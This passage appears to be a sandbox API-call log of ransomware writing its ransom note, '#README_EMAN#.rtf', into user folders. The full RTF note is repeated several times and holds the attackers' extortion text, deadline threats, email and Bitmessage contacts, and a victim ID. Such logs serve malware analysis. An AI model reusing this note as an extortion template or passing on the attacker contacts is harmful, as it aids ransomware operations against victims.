s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eeaaa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0280.878] WriteFile (in: hFile=0x2cc, lpBuffer=0x1eeaaa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eeaaa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.879] CloseHandle (hObject=0x2cc) returned 1 [0280.879] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0280.879] GetLastError () returned 0x2 [0280.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0281.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us 